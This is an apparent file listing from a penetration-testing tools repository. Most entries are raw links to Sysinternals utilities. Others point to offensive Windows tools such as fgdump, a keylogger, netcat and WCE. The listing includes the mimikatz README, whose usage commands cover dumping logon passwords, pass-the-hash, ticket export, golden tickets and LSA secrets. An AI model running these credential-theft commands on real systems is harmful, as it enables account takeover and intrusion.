https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/LoadOrd.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/PORTMON.CNT:
--------------------------------------------------------------------------------
:Base portmon.hlp
:Title Portmon
1 Introduction to Portmon
2 Introduction=INTRO
1 Using Portmon
2 Starting Portmon=START
2 Capturing Port Activity=CAPTURE
2 Searching and Filtering=SEARCH
2 Saving and Printing=SAVE
2 Options=OPTIONS
1 Remote Monitoring
2 Preparing for Remote Monitoring=REMOTE
2 Managing Remote Views=MANAGE
2 Managing Multiple Windows=WINDOW
1 Reporting Problems
2 Reporting Problems=BUG
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/PORTMON.HLP:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/PORTMON.HLP
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/Procmon.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Procmon.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/PsExec.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/PsExec.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/PsGetsid.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/PsGetsid.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/PsInfo.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/PsInfo.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/PsLoggedon.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/PsLoggedon.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/PsService.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/PsService.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/Pstools.chm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Pstools.chm
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/RAMMap.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/RAMMap.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/RegDelNull.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/RegDelNull.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/RootkitRevealer.chm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/RootkitRevealer.chm
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/RootkitRevealer.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/RootkitRevealer.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/ShareEnum.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ShareEnum.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/ShellRunas.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ShellRunas.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/Sysmon.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Sysmon.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/TCPVIEW.HLP:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/TCPVIEW.HLP
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/Tcpvcon.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Tcpvcon.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/Tcpview.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Tcpview.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/Vmmap.chm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Vmmap.chm
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/Volumeid.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Volumeid.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/WINOBJ.HLP:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/WINOBJ.HLP
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/Winobj.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/Winobj.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/ZoomIt.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ZoomIt.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/accesschk.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/accesschk.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/adrestore.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/adrestore.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/autoruns.chm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/autoruns.chm
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/autoruns.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/autoruns.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/autorunsc.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/autorunsc.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/ctrl2cap.amd.sys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ctrl2cap.amd.sys
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/ctrl2cap.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ctrl2cap.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/ctrl2cap.nt4.sys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ctrl2cap.nt4.sys
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/ctrl2cap.nt5.sys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ctrl2cap.nt5.sys
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/dbgview.chm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/dbgview.chm
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/disk2vhd.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/disk2vhd.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/diskext.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/diskext.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/du.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/du.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/efsdump.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/efsdump.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/handle.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/handle.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/hex2dec.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/hex2dec.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/junction.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/junction.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/ldmdump.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ldmdump.exe
--------------------------------------------------------------------------------
/net/Windows/SysinternalsSuite/livekd.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/livekd.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/logonsessions.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/logonsessions.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/movefile.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/movefile.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/ntfsinfo.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ntfsinfo.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/pagedfrg.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/pagedfrg.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/pagedfrg.hlp: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/pagedfrg.hlp -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/pendmoves.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/pendmoves.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/pipelist.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/pipelist.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/portmon.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/portmon.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/procdump.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/procdump.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/procexp.chm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/procexp.chm 
-------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/procexp.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/procexp.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/procmon.chm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/procmon.chm -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/psfile.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/psfile.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/pskill.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/pskill.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/pslist.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/pslist.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/psloglist.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/psloglist.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/pspasswd.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/pspasswd.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/psping.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/psping.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/psshutdown.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/psshutdown.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/pssuspend.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/pssuspend.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/psversion.txt: -------------------------------------------------------------------------------- 1 | PsTools Version in this package: 2.44 2 | -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/readme.txt: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/readme.txt -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/regjump.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/regjump.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/ru.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/ru.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/sdelete.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/sdelete.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/sigcheck.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/sigcheck.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/streams.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/streams.exe 
-------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/strings.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/strings.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/sync.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/sync.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/tcpview.chm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/tcpview.chm -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/vmmap.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/vmmap.exe -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/whois.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/SysinternalsSuite/whois.exe -------------------------------------------------------------------------------- /net/Windows/WiresharkPortable-1.12.3.paf.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/WiresharkPortable-1.12.3.paf.exe

/net/Windows/exe2bat.exe:
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/exe2bat.exe

/net/Windows/fgdump.exe:
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/fgdump.exe

/net/Windows/klogger.exe:
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/klogger.exe

/net/Windows/mimikatz_trunk/README.md:

# mimikatz

**`mimikatz`** is a tool I've made to learn `C` and make some experiments with Windows security.

It's now well known to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. **`mimikatz`** can also perform pass-the-hash, pass-the-ticket or build _Golden tickets_.

```
  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr  6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz                     (oe.eo)
  '#####'                                     with 13 modules * * */


mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
	msv :
	 [00000003] Primary
	 * Username   : Gentil Kiwi
	 * Domain     : vm-w7-ult-x
	 * LM         : d0e9aee149655a6075e4540af1f22d3b
	 * NTLM       : cc36cf7a8514893efccd332446158b1a
	 * SHA1       : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
	tspkg :
	 * Username   : Gentil Kiwi
	 * Domain     : vm-w7-ult-x
	 * Password   : waza1234/
...
```

But that's not all! `Crypto`, `Terminal Server`, `Events`, ... lots of information in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, _yes_).

If you don't want to build it, binaries are available on https://github.com/gentilkiwi/mimikatz/releases


## Quick usage
```
log
privilege::debug
```

### sekurlsa
```
sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
```

### kerberos
```
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
```

### crypto
```
crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export
```

### vault & lsadump
```
vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
```

## Build
`mimikatz` is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:
* for `mimikatz` and `mimilib` : Visual Studio 2010, 2012 or 2013 for Desktop (**2013 Express for Desktop is free and supports x86 & x64** - http://www.microsoft.com/download/details.aspx?id=43733)
* _for `mimikatz driver` (and `ddk2003` platform) : Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800_

`mimikatz` uses `SVN` for source control, but is now available with `GIT` too!
You can use any tool you want to sync, even the `GIT` support built into Visual Studio 2013 =)

### Synchronize!
* GIT URL is : https://github.com/gentilkiwi/mimikatz.git
* SVN URL is : https://github.com/gentilkiwi/mimikatz/trunk
* ZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zip

### Build the solution
* After opening the solution, `Build` / `Build Solution` (you can change architecture)
* `mimikatz` is now built and ready to be used! (`Win32` / `x64`)
* you may get error `MSB3073` about `_build_.cmd` and `mimidrv`; it's because the driver cannot be built without Windows Driver Kit **7.1** (WinDDK), but `mimikatz` and `mimilib` are OK.

### ddk2003
With this optional MSBuild platform, you can use the WinDDK build tools, and the default `msvcrt` runtime (smaller binaries, no dependencies)

For this optional platform, Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio **2010** are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.

Follow instructions:
* http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
* _http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader_

## Licence
CC BY 3.0 FR licence - http://creativecommons.org/licenses/by/3.0/fr/

## Author
Benjamin DELPY `gentilkiwi`, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )

This is a **personal** development, please respect its philosophy and don't use it for bad things!
/net/Windows/mimikatz_trunk/Win32/mimidrv.sys:
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/mimikatz_trunk/Win32/mimidrv.sys

/net/Windows/mimikatz_trunk/Win32/mimikatz.exe:
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/mimikatz_trunk/Win32/mimikatz.exe

/net/Windows/mimikatz_trunk/Win32/mimilib.dll:
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/mimikatz_trunk/Win32/mimilib.dll

/net/Windows/mimikatz_trunk/x64/mimidrv.sys:
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/mimikatz_trunk/x64/mimidrv.sys

/net/Windows/mimikatz_trunk/x64/mimikatz.exe:
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/mimikatz_trunk/x64/mimikatz.exe

/net/Windows/mimikatz_trunk/x64/mimilib.dll:
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/mimikatz_trunk/x64/mimilib.dll

/net/Windows/nc.exe:
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/nc.exe

/net/Windows/plink.exe:
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/plink.exe

/net/Windows/pscp.exe:
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/pscp.exe

/net/Windows/radmin.exe:
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/radmin.exe

/net/Windows/sbd.exe:
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/sbd.exe

/net/Windows/vncviewer.exe:
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/vncviewer.exe

/net/Windows/wce_v1_42beta_x32/Changelog:

Changelog for Windows Credentials Editor (WCE) 32-bit

version 1.42beta:
Nov 11, 2013
-Several bug fixes
-Improved support for unicode, cleartext passwords with special characters
 obtained with -w switch

version 1.41beta:
July 9, 2013
-Recompiled with VS2010 to make the EXE file (PE) compatible with XP/2003. 1.4beta
 was compiled with VS2012 which dropped support for XP/2003 and generates EXE PE files that are
 not compatible with XP/2003.

version 1.41beta:
May 30, 2013
-Several bug fixes
-Windows 8 Support
-Updated getlsasrvaddr.exe

/net/Windows/wce_v1_42beta_x32/LICENSE.txt:

# Copyright (c) 2010,2011,2012,2013 Hernan Ochoa and Amplia Security.
# All rights reserved.
#
# Unless you have express writen permission from the Copyright Holder, any
# use of or distribution of this software or portions of it, including, but not
# limited to, reimplementations, modifications and derived work of it, in
# either source code or any other form, as well as any other software using or
# referencing it in any way, may NOT be sold for commercial gain, must be
# covered by this very same license, and must retain this copyright notice and
# this license.
#
# Neither the name of the Copyright Holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THERE IS NO WARRANTY FOR THE SOFTWARE, TO THE EXTENT PERMITTED BY APPLICABLE
# LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR
# OTHER PARTIES PROVIDE THE SOFTWARE "AS IS" WITHOUT WARRANTY OF ANY KIND,
# EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE
# ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE SOFTWARE IS WITH YOU.
# SHOULD THE SOFTWARE PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY
# SERVICING, REPAIR OR CORRECTION.
#
